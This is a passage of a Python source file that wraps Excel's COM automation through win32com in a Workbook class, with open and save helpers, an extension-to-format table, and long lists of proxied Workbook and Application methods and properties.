= ProxyProperty('xl.WorksheetFunction') Worksheets = ProxyProperty('xl.Worksheets') class Workbook(object): METHOD_SETTER_ERROR = 'Cannot set property ' SAVE_ON_CLOSE = False def __init__(self, filename=None, *args, xl=None, wb=None, **xl_settings): # Variables self._xl = xl self._wb = wb self._filename = None # Save the filename as a variable # Initialize Excel if self._xl is None: self._xl = Excel(**xl_settings) # Set the filename self.set_filename(filename) # Check to open the filename if isinstance(self.filename, str) and os.path.exists(self.filename) and os.path.isfile(self.filename): self.open(filename) # Initialize constants self.init_constants() def init_constants(self): """Set all of the constant values.""" for k, field in self.__class__.__dict__.items(): if isinstance(field, ConstantItem): field.init_table(self) @property def xl(self): """Get (or create) the Excel Application object.""" if self._xl is None: self._xl = Excel() return self._xl @xl.setter def xl(self, value): """Set the Excel Application object.""" self._xl = value @property def wb(self): """Get (or Add) a Workbook to the Excel Application Workbooks collection.""" if self._wb is None: self._wb = self.xl.Workbooks.Add() return self._wb @wb.setter def wb(self, value): """Set the Workbook object.""" try: self._wb.Close(self.SAVE_ON_CLOSE) except (AttributeError, Exception): pass self._wb = value def get_filename(self): """Return the filename.""" return self._filename def set_filename(self, filename): """Set the filename. 
Args: filename (str/object): Filename to save and open from. """ if isinstance(filename, str): filename = os.path.abspath(filename) self._filename = filename filename = property(get_filename, set_filename) def open(self, filename=None): """Open a workbook with the given filename and use this workbook.""" if filename is not None: self.set_filename(filename) filename = self.get_filename() if isinstance(filename, str) and os.path.exists(filename) and os.path.isfile(filename): self._wb = self.xl.Workbooks.Open(filename) return self EXT_TO_FMT = { # Lower case extension to Format '.xla': win32com.client.constants.xlAddIn, '.csv': win32com.client.constants.xlCSV, '.txt': win32com.client.constants.xlCurrentPlatformText, '.dbf': win32com.client.constants.xlDBF4, '.dif': win32com.client.constants.xlDIF, '.xlsb': win32com.client.constants.xlExcel12, # '.xls': win32com.client.constants.xlExcel8, '.htm': win32com.client.constants.xlHtml, '.html': win32com.client.constants.xlHtml, '.ods': win32com.client.constants.xlOpenDocumentSpreadsheet, '.xlam': win32com.client.constants.xlOpenXMLAddIn, '.xltx': win32com.client.constants.xlOpenXMLTemplate, # win32com.client.constants.xlTemplate, '.xlsm': win32com.client.constants.xlOpenXMLWorkbookMacroEnabled, '.slk': win32com.client.constants.xlSYLK, '.xlt': win32com.client.constants.xlTemplate, '.prn': win32com.client.constants.xlTextPrinter, '.mht': win32com.client.constants.xlWebArchive, '.mhtml': win32com.client.constants.xlWebArchive, '.wj2': win32com.client.constants.xlWJ2WD1, '.wj3': win32com.client.constants.xlWJ3FJ3, '.wk1': win32com.client.constants.xlWK3FM3, '.wk3': win32com.client.constants.xlWK3, '.wk4': win32com.client.constants.xlWK4, '.wks': win32com.client.constants.xlWKS, '.xlsx': win32com.client.constants.xlWorkbookDefault, '.xls': win32com.client.constants.xlWorkbookNormal, '.wq1': win32com.client.constants.xlWQ1, '.xml': win32com.client.constants.xlXMLSpreadsheet, } def save(self, filename=None): """Save the given filename or set filename.""" if filename is not None: self.set_filename(filename) filename = self.get_filename() ext = os.path.splitext(filename)[-1].lower() file_fmt = self.EXT_TO_FMT.get(ext, None) # Saving as CSV or non excel type renames the active sheet to the base filename. 
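        # Capture the current sheet name before SaveAs and restore it afterwards,
        # so exporting to CSV/text does not permanently rename the active sheet.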
sheet_name = self.wb.ActiveSheet.Name self.wb.SaveAs(filename, file_fmt) self.wb.ActiveSheet.Name = sheet_name def get_sheet(self, sheet, create=True): """Return the sheet for an index or name.""" if isinstance(sheet, int): sheet = 'Sheet'+str(sheet) try: obj = self.wb.Sheets(sheet) # Get the sheet obj.Activate() except (ValueError, TypeError, Exception): if create: obj = self.wb.Sheets.Add() # Create the sheet obj.Name = sheet else: obj = None return obj def has_sheet(self, sheet): """Return if the given sheet name or index exists""" return self.get_sheet(sheet, create=False) is not None # ===== Workbook Object Methods ===== https://docs.microsoft.com/en-us/office/vba/api/excel.workbook#methods AcceptAllChanges = ProxyMethod('wb.AcceptAllChanges', setter_error=METHOD_SETTER_ERROR) Activate = ProxyMethod('wb.Activate', setter_error=METHOD_SETTER_ERROR) AddToFavorites = ProxyMethod('wb.AddToFavorites', setter_error=METHOD_SETTER_ERROR) ApplyTheme = ProxyMethod('wb.ApplyTheme', setter_error=METHOD_SETTER_ERROR) BreakLink = ProxyMethod('wb.BreakLink', setter_error=METHOD_SETTER_ERROR) CanCheckIn = ProxyMethod('wb.CanCheckIn', setter_error=METHOD_SETTER_ERROR) ChangeFileAccess = ProxyMethod('wb.ChangeFileAccess', setter_error=METHOD_SETTER_ERROR) ChangeLink = ProxyMethod('wb.ChangeLink', setter_error=METHOD_SETTER_ERROR) CheckIn = ProxyMethod('wb.CheckIn', setter_error=METHOD_SETTER_ERROR) CheckInWithVersion = ProxyMethod('wb.CheckInWithVersion', setter_error=METHOD_SETTER_ERROR) Close = ProxyMethod('wb.Close', setter_error=METHOD_SETTER_ERROR) ConvertComments = ProxyMethod('wb.ConvertComments', setter_error=METHOD_SETTER_ERROR) CreateForecastSheet = ProxyMethod('wb.CreateForecastSheet', setter_error=METHOD_SETTER_ERROR) DeleteNumberFormat = ProxyMethod('wb.DeleteNumberFormat', setter_error=METHOD_SETTER_ERROR) EnableConnections = ProxyMethod('wb.EnableConnections', setter_error=METHOD_SETTER_ERROR) EndReview = ProxyMethod('wb.EndReview', setter_error=METHOD_SETTER_ERROR) ExclusiveAccess = ProxyMethod('wb.ExclusiveAccess', setter_error=METHOD_SETTER_ERROR) ExportAsFixedFormat = ProxyMethod('wb.ExportAsFixedFormat', setter_error=METHOD_SETTER_ERROR) FollowHyperlink = ProxyMethod('wb.FollowHyperlink', setter_error=METHOD_SETTER_ERROR) ForwardMailer = ProxyMethod('wb.ForwardMailer', setter_error=METHOD_SETTER_ERROR) GetWorkflowTasks = ProxyMethod('wb.GetWorkflowTasks', setter_error=METHOD_SETTER_ERROR) GetWorkflowTemplates = ProxyMethod('wb.GetWorkflowTemplates', setter_error=METHOD_SETTER_ERROR) HighlightChangesOptions = ProxyMethod('wb.HighlightChangesOptions', setter_error=METHOD_SETTER_ERROR) LinkInfo = ProxyMethod('wb.LinkInfo', setter_error=METHOD_SETTER_ERROR) LinkSources = ProxyMethod('wb.LinkSources', setter_error=METHOD_SETTER_ERROR) LockServerFile = ProxyMethod('wb.LockServerFile', setter_error=METHOD_SETTER_ERROR) MergeWorkbook = ProxyMethod('wb.MergeWorkbook', setter_error=METHOD_SETTER_ERROR) NewWindow = ProxyMethod('wb.NewWindow', setter_error=METHOD_SETTER_ERROR) OpenLinks = ProxyMethod('wb.OpenLinks', setter_error=METHOD_SETTER_ERROR) PivotCaches = ProxyMethod('wb.PivotCaches', setter_error=METHOD_SETTER_ERROR) Post = ProxyMethod('wb.Post', setter_error=METHOD_SETTER_ERROR) PrintOut = ProxyMethod('wb.PrintOut', setter_error=METHOD_SETTER_ERROR) PrintPreview = ProxyMethod('wb.PrintPreview', setter_error=METHOD_SETTER_ERROR) Protect = ProxyMethod('wb.Protect', setter_error=METHOD_SETTER_ERROR) ProtectSharing = ProxyMethod('wb.ProtectSharing', setter_error=METHOD_SETTER_ERROR) 
PublishToDocs = ProxyMethod('wb.PublishToDocs', setter_error=METHOD_SETTER_ERROR) PurgeChangeHistoryNow = ProxyMethod('wb.PurgeChangeHistoryNow', setter_error=METHOD_SETTER_ERROR) RefreshAll = ProxyMethod('wb.RefreshAll', setter_error=METHOD_SETTER_ERROR) RejectAllChanges = ProxyMethod('wb.RejectAllChanges', setter_error=METHOD_SETTER_ERROR) ReloadAs = ProxyMethod('wb.ReloadAs', setter_error=METHOD_SETTER_ERROR) RemoveDocumentInformation = ProxyMethod('wb.RemoveDocumentInformation', setter_error=METHOD_SETTER_ERROR) RemoveUser = ProxyMethod('wb.RemoveUser', setter_error=METHOD_SETTER_ERROR) Reply = ProxyMethod('wb.Reply', setter_error=METHOD_SETTER_ERROR) ReplyAll = ProxyMethod('wb.ReplyAll', setter_error=METHOD_SETTER_ERROR) ReplyWithChanges = ProxyMethod('wb.ReplyWithChanges', setter_error=METHOD_SETTER_ERROR) ResetColors = ProxyMethod('wb.ResetColors', setter_error=METHOD_SETTER_ERROR) RunAutoMacros = ProxyMethod('wb.RunAutoMacros', setter_error=METHOD_SETTER_ERROR) Save = ProxyMethod('wb.Save', setter_error=METHOD_SETTER_ERROR) SaveAs = ProxyMethod('wb.SaveAs', setter_error=METHOD_SETTER_ERROR) SaveAsXMLData = ProxyMethod('wb.SaveAsXMLData', setter_error=METHOD_SETTER_ERROR) SaveCopyAs = ProxyMethod('wb.SaveCopyAs', setter_error=METHOD_SETTER_ERROR) SendFaxOverInternet = ProxyMethod('wb.SendFaxOverInternet', setter_error=METHOD_SETTER_ERROR) SendForReview = ProxyMethod('wb.SendForReview', setter_error=METHOD_SETTER_ERROR) SendMail = ProxyMethod('wb.SendMail', setter_error=METHOD_SETTER_ERROR) SendMailer = ProxyMethod('wb.SendMailer', setter_error=METHOD_SETTER_ERROR) SetLinkOnData = ProxyMethod('wb.SetLinkOnData', setter_error=METHOD_SETTER_ERROR) SetPasswordEncryptionOptions = ProxyMethod('wb.SetPasswordEncryptionOptions', setter_error=METHOD_SETTER_ERROR) ToggleFormsDesign = ProxyMethod('wb.ToggleFormsDesign', setter_error=METHOD_SETTER_ERROR) Unprotect = ProxyMethod('wb.Unprotect', setter_error=METHOD_SETTER_ERROR) UnprotectSharing = ProxyMethod('wb.UnprotectSharing', setter_error=METHOD_SETTER_ERROR) UpdateFromFile = ProxyMethod('wb.UpdateFromFile', setter_error=METHOD_SETTER_ERROR) UpdateLink = ProxyMethod('wb.UpdateLink', setter_error=METHOD_SETTER_ERROR) WebPagePreview = ProxyMethod('wb.WebPagePreview', setter_error=METHOD_SETTER_ERROR) XmlImport = ProxyMethod('wb.XmlImport', setter_error=METHOD_SETTER_ERROR) XmlImportXml = ProxyMethod('wb.XmlImportXml', setter_error=METHOD_SETTER_ERROR) # ===== Workbook Object Properties ===== https://docs.microsoft.com/en-us/office/vba/api/excel.workbook#properties AccuracyVersion = ProxyProperty('wb.AccuracyVersion') ActiveChart = ProxyProperty('wb.ActiveChart') ActiveSheet = ProxyProperty('wb.ActiveSheet') ActiveSlicer = ProxyProperty('wb.ActiveSlicer') Application = ProxyProperty('wb.Application') AutoSaveOn = ProxyProperty('wb.AutoSaveOn') AutoUpdateFrequency = ProxyProperty('wb.AutoUpdateFrequency') AutoUpdateSaveChanges = ProxyProperty('wb.AutoUpdateSaveChanges') BuiltinDocumentProperties = ProxyProperty('wb.BuiltinDocumentProperties') CalculationVersion = ProxyProperty('wb.CalculationVersion') CaseSensitive = ProxyProperty('wb.CaseSensitive') ChangeHistoryDuration = ProxyProperty('wb.ChangeHistoryDuration') ChartDataPointTrack = ProxyProperty('wb.ChartDataPointTrack') Charts = ProxyProperty('wb.Charts') CheckCompatibility = ProxyProperty('wb.CheckCompatibility') CodeName = ProxyProperty('wb.CodeName') Colors = ProxyProperty('wb.Colors') CommandBars = ProxyProperty('wb.CommandBars') ConflictResolution = 
ProxyProperty('wb.ConflictResolution') Connections = ProxyProperty('wb.Connections') ConnectionsDisabled = ProxyProperty('wb.ConnectionsDisabled') Container = ProxyProperty('wb.Container') ContentTypeProperties = ProxyProperty('wb.ContentTypeProperties') CreateBackup = ProxyProperty('wb.CreateBackup') Creator = ProxyProperty('wb.Creator') CustomDocumentProperties = ProxyProperty('wb.CustomDocumentProperties') CustomViews = ProxyProperty('wb.CustomViews') CustomXMLParts = ProxyProperty('wb.CustomXMLParts') Date1904 = ProxyProperty('wb.Date1904') DefaultPivotTableStyle = ProxyProperty('wb.DefaultPivotTableStyle') DefaultSlicerStyle = ProxyProperty('wb.DefaultSlicerStyle') DefaultTableStyle = ProxyProperty('wb.DefaultTableStyle') DefaultTimelineStyle = ProxyProperty('wb.DefaultTimelineStyle') DisplayDrawingObjects = ProxyProperty('wb.DisplayDrawingObjects') DisplayInkComments = ProxyProperty('wb.DisplayInkComments') DocumentInspectors = ProxyProperty('wb.DocumentInspectors') DocumentLibraryVersions = ProxyProperty('wb.DocumentLibraryVersions') DoNotPromptForConvert = ProxyProperty('wb.DoNotPromptForConvert') EnableAutoRecover = ProxyProperty('wb.EnableAutoRecover') EncryptionProvider = ProxyProperty('wb.EncryptionProvider') EnvelopeVisible = ProxyProperty('wb.EnvelopeVisible') Excel4IntlMacroSheets = ProxyProperty('wb.Excel4IntlMacroSheets') Excel4MacroSheets = ProxyProperty('wb.Excel4MacroSheets') Excel8CompatibilityMode = ProxyProperty('wb.Excel8CompatibilityMode') FileFormat = ProxyProperty('wb.FileFormat') Final = ProxyProperty('wb.Final') ForceFullCalculation = ProxyProperty('wb.ForceFullCalculation') FullName = ProxyProperty('wb.FullName') FullNameURLEncoded = ProxyProperty('wb.FullNameURLEncoded') HasPassword = ProxyProperty('wb.HasPassword') HasVBProject = ProxyProperty('wb.HasVBProject') HighlightChangesOnScreen = ProxyProperty('wb.HighlightChangesOnScreen') IconSets = ProxyProperty('wb.IconSets') InactiveListBorderVisible = ProxyProperty('wb.InactiveListBorderVisible') IsAddin = ProxyProperty('wb.IsAddin') IsInplace = ProxyProperty('wb.IsInplace') KeepChangeHistory = ProxyProperty('wb.KeepChangeHistory') ListChangesOnNewSheet = ProxyProperty('wb.ListChangesOnNewSheet') Mailer = ProxyProperty('wb.Mailer') Model = ProxyProperty('wb.Model') MultiUserEditing = ProxyProperty('wb.MultiUserEditing') Name = ProxyProperty('wb.Name') Names = ProxyProperty('wb.Names') Parent = ProxyProperty('wb.Parent') Password = ProxyProperty('wb.Password') PasswordEncryptionAlgorithm = ProxyProperty('wb.PasswordEncryptionAlgorithm') PasswordEncryptionFileProperties = ProxyProperty('wb.PasswordEncryptionFileProperties') PasswordEncryptionKeyLength = ProxyProperty('wb.PasswordEncryptionKeyLength') PasswordEncryptionProvider = ProxyProperty('wb.PasswordEncryptionProvider') Path = ProxyProperty('wb.Path') Permission = ProxyProperty('wb.Permission') PersonalViewListSettings = ProxyProperty('wb.PersonalViewListSettings') PersonalViewPrintSettings = ProxyProperty('wb.PersonalViewPrintSettings') PivotTables = ProxyProperty('wb.PivotTables') PrecisionAsDisplayed = ProxyProperty('wb.PrecisionAsDisplayed') ProtectStructure = ProxyProperty('wb.ProtectStructure') ProtectWindows = ProxyProperty('wb.ProtectWindows') PublishObjects = ProxyProperty('wb.PublishObjects') Queries = ProxyProperty('wb.Queries') ReadOnly = ProxyProperty('wb.ReadOnly') ReadOnlyRecommended = ProxyProperty('wb.ReadOnlyRecommended') RemovePersonalInformation = ProxyProperty('wb.RemovePersonalInformation') Research = ProxyProperty('wb.Research') 
RevisionNumber = ProxyProperty('wb.RevisionNumber') Saved = ProxyProperty('wb.Saved') SaveLinkValues = ProxyProperty('wb.SaveLinkValues') ServerPolicy = ProxyProperty('wb.ServerPolicy') ServerViewableItems = ProxyProperty('wb.ServerViewableItems') SharedWorkspace = ProxyProperty('wb.SharedWorkspace') # Sheets = ProxyProperty('wb.Sheets') ShowConflictHistory = ProxyProperty('wb.ShowConflictHistory') ShowPivotChartActiveFields = ProxyProperty('wb.ShowPivotChartActiveFields') ShowPivotTableFieldList = ProxyProperty('wb.ShowPivotTableFieldList') Signatures = ProxyProperty('wb.Signatures') SlicerCaches = ProxyProperty('wb.SlicerCaches') SmartDocument = ProxyProperty('wb.SmartDocument') Styles = ProxyProperty('wb.Styles') Sync = ProxyProperty('wb.Sync') TableStyles = ProxyProperty('wb.TableStyles') TemplateRemoveExtData = ProxyProperty('wb.TemplateRemoveExtData') Theme = ProxyProperty('wb.Theme') UpdateLinks = ProxyProperty('wb.UpdateLinks') UpdateRemoteReferences = ProxyProperty('wb.UpdateRemoteReferences') UserStatus = ProxyProperty('wb.UserStatus') UseWholeCellCriteria = ProxyProperty('wb.UseWholeCellCriteria') UseWildcards = ProxyProperty('wb.UseWildcards') VBASigned = ProxyProperty('wb.VBASigned') VBProject = ProxyProperty('wb.VBProject') WebOptions = ProxyProperty('wb.WebOptions') Windows = ProxyProperty('wb.Windows') Worksheets = ProxyProperty('wb.Worksheets') WritePassword = ProxyProperty('wb.WritePassword') WriteReserved = ProxyProperty('wb.WriteReserved') WriteReservedBy = ProxyProperty('wb.WriteReservedBy') XmlMaps = ProxyProperty('wb.XmlMaps') XmlNamespaces = ProxyProperty('wb.XmlNamespaces') # ===== Application Methods ===== https://docs.microsoft.com/en-us/office/vba/api/excel.application(object) ActivateMicrosoftApp = ProxyMethod('xl.ActivateMicrosoftApp', setter_error=METHOD_SETTER_ERROR) AddCustomList = ProxyMethod('xl.AddCustomList', setter_error=METHOD_SETTER_ERROR) Calculate = ProxyMethod('xl.Calculate', setter_error=METHOD_SETTER_ERROR) CalculateFull = ProxyMethod('xl.CalculateFull', setter_error=METHOD_SETTER_ERROR) CalculateFullRebuild = ProxyMethod('xl.CalculateFullRebuild', setter_error=METHOD_SETTER_ERROR) CalculateUntilAsyncQueriesDone = ProxyMethod('xl.CalculateUntilAsyncQueriesDone', setter_error=METHOD_SETTER_ERROR) CentimetersToPoints = ProxyMethod('xl.CentimetersToPoints', setter_error=METHOD_SETTER_ERROR) CheckAbort = ProxyMethod('xl.CheckAbort', setter_error=METHOD_SETTER_ERROR) CheckSpelling = ProxyMethod('xl.CheckSpelling', setter_error=METHOD_SETTER_ERROR) ConvertFormula = ProxyMethod('xl.ConvertFormula', setter_error=METHOD_SETTER_ERROR) DDEExecute = ProxyMethod('xl.DDEExecute', setter_error=METHOD_SETTER_ERROR) DDEInitiate = ProxyMethod('xl.DDEInitiate', setter_error=METHOD_SETTER_ERROR) DDEPoke = ProxyMethod('xl.DDEPoke', setter_error=METHOD_SETTER_ERROR) DDERequest = ProxyMethod('xl.DDERequest', setter_error=METHOD_SETTER_ERROR) DDETerminate = ProxyMethod('xl.DDETerminate', setter_error=METHOD_SETTER_ERROR) DeleteCustomList = ProxyMethod('xl.DeleteCustomList', setter_error=METHOD_SETTER_ERROR) DisplayXMLSourcePane = ProxyMethod('xl.DisplayXMLSourcePane', setter_error=METHOD_SETTER_ERROR) DoubleClick = ProxyMethod('xl.DoubleClick', setter_error=METHOD_SETTER_ERROR) Evaluate = ProxyMethod('xl.Evaluate', setter_error=METHOD_SETTER_ERROR) ExecuteExcel4Macro = ProxyMethod('xl.ExecuteExcel4Macro', setter_error=METHOD_SETTER_ERROR) FindFile = ProxyMethod('xl.FindFile', setter_error=METHOD_SETTER_ERROR) GetCustomListContents = 
ProxyMethod('xl.GetCustomListContents', setter_error=METHOD_SETTER_ERROR) GetCustomListNum = ProxyMethod('xl.GetCustomListNum', setter_error=METHOD_SETTER_ERROR) GetOpenFilename = ProxyMethod('xl.GetOpenFilename', setter_error=METHOD_SETTER_ERROR) GetPhonetic = ProxyMethod('xl.GetPhonetic', setter_error=METHOD_SETTER_ERROR) GetSaveAsFilename = ProxyMethod('xl.GetSaveAsFilename', setter_error=METHOD_SETTER_ERROR) Goto = ProxyMethod('xl.Goto', setter_error=METHOD_SETTER_ERROR) Help = ProxyMethod('xl.Help', setter_error=METHOD_SETTER_ERROR) InchesToPoints = ProxyMethod('xl.InchesToPoints', setter_error=METHOD_SETTER_ERROR) InputBox = ProxyMethod('xl.InputBox', setter_error=METHOD_SETTER_ERROR) Intersect = ProxyMethod('xl.Intersect', setter_error=METHOD_SETTER_ERROR) MacroOptions = ProxyMethod('xl.MacroOptions', setter_error=METHOD_SETTER_ERROR) MailLogoff = ProxyMethod('xl.MailLogoff', setter_error=METHOD_SETTER_ERROR) MailLogon = ProxyMethod('xl.MailLogon', setter_error=METHOD_SETTER_ERROR) NextLetter = ProxyMethod('xl.NextLetter', setter_error=METHOD_SETTER_ERROR) OnKey = ProxyMethod('xl.OnKey', setter_error=METHOD_SETTER_ERROR) OnRepeat = ProxyMethod('xl.OnRepeat', setter_error=METHOD_SETTER_ERROR) OnTime = ProxyMethod('xl.OnTime', setter_error=METHOD_SETTER_ERROR) OnUndo = ProxyMethod('xl.OnUndo', setter_error=METHOD_SETTER_ERROR) Quit = ProxyMethod('xl.Quit', setter_error=METHOD_SETTER_ERROR) RecordMacro = ProxyMethod('xl.RecordMacro', setter_error=METHOD_SETTER_ERROR) RegisterXLL = ProxyMethod('xl.RegisterXLL', setter_error=METHOD_SETTER_ERROR) Repeat = ProxyMethod('xl.Repeat', setter_error=METHOD_SETTER_ERROR) Run = ProxyMethod('xl.Run', setter_error=METHOD_SETTER_ERROR) SendKeys = ProxyMethod('xl.SendKeys', setter_error=METHOD_SETTER_ERROR) SharePointVersion = ProxyMethod('xl.SharePointVersion', setter_error=METHOD_SETTER_ERROR) Undo = ProxyMethod('xl.Undo', setter_error=METHOD_SETTER_ERROR) Union = ProxyMethod('xl.Union', setter_error=METHOD_SETTER_ERROR) Volatile = ProxyMethod('xl.Volatile', setter_error=METHOD_SETTER_ERROR) Wait = ProxyMethod('xl.Wait', setter_error=METHOD_SETTER_ERROR) # ===== Application Properties ===== https://docs.microsoft.com/en-us/office/vba/api/excel.application(object) ActiveCell = ProxyProperty('xl.ActiveCell') # ActiveChart = ProxyProperty('xl.ActiveChart') ActiveEncryptionSession = ProxyProperty('xl.ActiveEncryptionSession') ActivePrinter = ProxyProperty('xl.ActivePrinter') ActiveProtectedViewWindow = ProxyProperty('xl.ActiveProtectedViewWindow') # ActiveSheet = ProxyProperty('xl.ActiveSheet') ActiveWindow = ProxyProperty('xl.ActiveWindow') ActiveWorkbook = ProxyProperty('xl.ActiveWorkbook') AddIns = ProxyProperty('xl.AddIns') AddIns2 = ProxyProperty('xl.AddIns2') AlertBeforeOverwriting = ProxyProperty('xl.AlertBeforeOverwriting') AltStartupPath = ProxyProperty('xl.AltStartupPath') AlwaysUseClearType = ProxyProperty('xl.AlwaysUseClearType') # Application = ProxyProperty('xl.Application') ArbitraryXMLSupportAvailable = ProxyProperty('xl.ArbitraryXMLSupportAvailable') AskToUpdateLinks = ProxyProperty('xl.AskToUpdateLinks') Assistance = ProxyProperty('xl.Assistance') AutoCorrect = ProxyProperty('xl.AutoCorrect') AutoFormatAsYouTypeReplaceHyperlinks = ProxyProperty('xl.AutoFormatAsYouTypeReplaceHyperlinks') AutomationSecurity = ProxyProperty('xl.AutomationSecurity') AutoPercentEntry = ProxyProperty('xl.AutoPercentEntry') AutoRecover = ProxyProperty('xl.AutoRecover') Build = ProxyProperty('xl.Build') CalculateBeforeSave = 
ProxyProperty('xl.CalculateBeforeSave') Calculation = ProxyProperty('xl.Calculation') CalculationInterruptKey = ProxyProperty('xl.CalculationInterruptKey') CalculationState = ProxyProperty('xl.CalculationState') # CalculationVersion = ProxyProperty('xl.CalculationVersion') Caller = ProxyProperty('xl.Caller') CanPlaySounds = ProxyProperty('xl.CanPlaySounds') CanRecordSounds = ProxyProperty('xl.CanRecordSounds') Caption = ProxyProperty('xl.Caption') CellDragAndDrop = ProxyProperty('xl.CellDragAndDrop') Cells = ProxyProperty('xl.Cells') # ChartDataPointTrack = ProxyProperty('xl.ChartDataPointTrack') # Charts = ProxyProperty('xl.Charts') ClipboardFormats = ProxyProperty('xl.ClipboardFormats') ClusterConnector = ProxyProperty('xl.ClusterConnector') Columns = ProxyProperty('xl.Columns') COMAddIns = ProxyProperty('xl.COMAddIns') # CommandBars = ProxyProperty('xl.CommandBars') CommandUnderlines = ProxyProperty('xl.CommandUnderlines') ConstrainNumeric = ProxyProperty('xl.ConstrainNumeric') ControlCharacters = ProxyProperty('xl.ControlCharacters') CopyObjectsWithCells = ProxyProperty('xl.CopyObjectsWithCells') # Creator = ProxyProperty('xl.Creator') Cursor = ProxyProperty('xl.Cursor') CursorMovement = ProxyProperty('xl.CursorMovement') CustomListCount = ProxyProperty('xl.CustomListCount') CutCopyMode = ProxyProperty('xl.CutCopyMode') DataEntryMode = ProxyProperty('xl.DataEntryMode') DDEAppReturnCode = ProxyProperty('xl.DDEAppReturnCode') DecimalSeparator = ProxyProperty('xl.DecimalSeparator') DefaultFilePath = ProxyProperty('xl.DefaultFilePath') DefaultSaveFormat = ProxyProperty('xl.DefaultSaveFormat') DefaultSheetDirection = ProxyProperty('xl.DefaultSheetDirection') DefaultWebOptions = ProxyProperty('xl.DefaultWebOptions') DeferAsyncQueries = ProxyProperty('xl.DeferAsyncQueries') Dialogs = ProxyProperty('xl.Dialogs') DisplayAlerts = ProxyProperty('xl.DisplayAlerts') DisplayClipboardWindow = ProxyProperty('xl.DisplayClipboardWindow') DisplayCommentIndicator = ProxyProperty('xl.DisplayCommentIndicator') DisplayDocumentActionTaskPane = ProxyProperty('xl.DisplayDocumentActionTaskPane') DisplayDocumentInformationPanel = ProxyProperty('xl.DisplayDocumentInformationPanel') DisplayExcel4Menus = ProxyProperty('xl.DisplayExcel4Menus') DisplayFormulaAutoComplete = ProxyProperty('xl.DisplayFormulaAutoComplete') DisplayFormulaBar = ProxyProperty('xl.DisplayFormulaBar') DisplayFullScreen = ProxyProperty('xl.DisplayFullScreen') DisplayFunctionToolTips = ProxyProperty('xl.DisplayFunctionToolTips') DisplayInsertOptions = ProxyProperty('xl.DisplayInsertOptions') DisplayNoteIndicator = ProxyProperty('xl.DisplayNoteIndicator') DisplayPasteOptions = ProxyProperty('xl.DisplayPasteOptions') DisplayRecentFiles = ProxyProperty('xl.DisplayRecentFiles') DisplayScrollBars = ProxyProperty('xl.DisplayScrollBars') DisplayStatusBar = ProxyProperty('xl.DisplayStatusBar') EditDirectlyInCell = ProxyProperty('xl.EditDirectlyInCell') EnableAnimations = ProxyProperty('xl.EnableAnimations') EnableAutoComplete = ProxyProperty('xl.EnableAutoComplete') EnableCancelKey = ProxyProperty('xl.EnableCancelKey') EnableCheckFileExtensions = ProxyProperty('xl.EnableCheckFileExtensions') EnableEvents = ProxyProperty('xl.EnableEvents') EnableLargeOperationAlert = ProxyProperty('xl.EnableLargeOperationAlert') EnableLivePreview = ProxyProperty('xl.EnableLivePreview') EnableMacroAnimations = ProxyProperty('xl.EnableMacroAnimations') EnableSound = ProxyProperty('xl.EnableSound') ErrorCheckingOptions = ProxyProperty('xl.ErrorCheckingOptions') # 
Excel4IntlMacroSheets = ProxyProperty('xl.Excel4IntlMacroSheets') # Excel4MacroSheets = ProxyProperty('xl.Excel4MacroSheets') ExtendList = ProxyProperty('xl.ExtendList') FeatureInstall = ProxyProperty('xl.FeatureInstall') FileConverters = ProxyProperty('xl.FileConverters') FileDialog = ProxyProperty('xl.FileDialog') FileExportConverters = ProxyProperty('xl.FileExportConverters') FileValidation = ProxyProperty('xl.FileValidation') FileValidationPivot = ProxyProperty('xl.FileValidationPivot') FindFormat = ProxyProperty('xl.FindFormat') FixedDecimal = ProxyProperty('xl.FixedDecimal') FixedDecimalPlaces = ProxyProperty('xl.FixedDecimalPlaces') FlashFill = ProxyProperty('xl.FlashFill') FlashFillMode = ProxyProperty('xl.FlashFillMode') FormulaBarHeight = ProxyProperty('xl.FormulaBarHeight') GenerateGetPivotData = ProxyProperty('xl.GenerateGetPivotData') GenerateTableRefs = ProxyProperty('xl.GenerateTableRefs') Height = ProxyProperty('xl.Height') HighQualityModeForGraphics = ProxyProperty('xl.HighQualityModeForGraphics') Hinstance = ProxyProperty('xl.Hinstance') HinstancePtr = ProxyProperty('xl.HinstancePtr') Hwnd = ProxyProperty('xl.Hwnd') IgnoreRemoteRequests = ProxyProperty('xl.IgnoreRemoteRequests') Interactive = ProxyProperty('xl.Interactive') International = ProxyProperty('xl.International') IsSandboxed = ProxyProperty('xl.IsSandboxed') Iteration = ProxyProperty('xl.Iteration') LanguageSettings = ProxyProperty('xl.LanguageSettings') LargeOperationCellThousandCount = ProxyProperty('xl.LargeOperationCellThousandCount') Left = ProxyProperty('xl.Left') LibraryPath = ProxyProperty('xl.LibraryPath') MailSession = ProxyProperty('xl.MailSession') MailSystem = ProxyProperty('xl.MailSystem') MapPaperSize = ProxyProperty('xl.MapPaperSize') MathCoprocessorAvailable = ProxyProperty('xl.MathCoprocessorAvailable') MaxChange = ProxyProperty('xl.MaxChange') MaxIterations = ProxyProperty('xl.MaxIterations') MeasurementUnit = ProxyProperty('xl.MeasurementUnit') MergeInstances = ProxyProperty('xl.MergeInstances') MouseAvailable = ProxyProperty('xl.MouseAvailable') MoveAfterReturn = ProxyProperty('xl.MoveAfterReturn') MoveAfterReturnDirection = ProxyProperty('xl.MoveAfterReturnDirection') MultiThreadedCalculation = ProxyProperty('xl.MultiThreadedCalculation') # Name = ProxyProperty('xl.Name') # Names = ProxyProperty('xl.Names') NetworkTemplatesPath = ProxyProperty('xl.NetworkTemplatesPath') NewWorkbook = ProxyProperty('xl.NewWorkbook') ODBCErrors = ProxyProperty('xl.ODBCErrors') ODBCTimeout = ProxyProperty('xl.ODBCTimeout') OLEDBErrors = ProxyProperty('xl.OLEDBErrors') OnWindow = ProxyProperty('xl.OnWindow') OperatingSystem = ProxyProperty('xl.OperatingSystem') OrganizationName = ProxyProperty('xl.OrganizationName') # Parent = ProxyProperty('xl.Parent') # Path = ProxyProperty('xl.Path') PathSeparator = ProxyProperty('xl.PathSeparator') PivotTableSelection = ProxyProperty('xl.PivotTableSelection') PreviousSelections = ProxyProperty('xl.PreviousSelections') PrintCommunication = ProxyProperty('xl.PrintCommunication') ProductCode = ProxyProperty('xl.ProductCode') PromptForSummaryInfo = ProxyProperty('xl.PromptForSummaryInfo') ProtectedViewWindows = ProxyProperty('xl.ProtectedViewWindows') QuickAnalysis = ProxyProperty('xl.QuickAnalysis') Range = ProxyProperty('xl.Range') Ready = ProxyProperty('xl.Ready') RecentFiles = ProxyProperty('xl.RecentFiles') RecordRelative = ProxyProperty('xl.RecordRelative') ReferenceStyle = ProxyProperty('xl.ReferenceStyle') 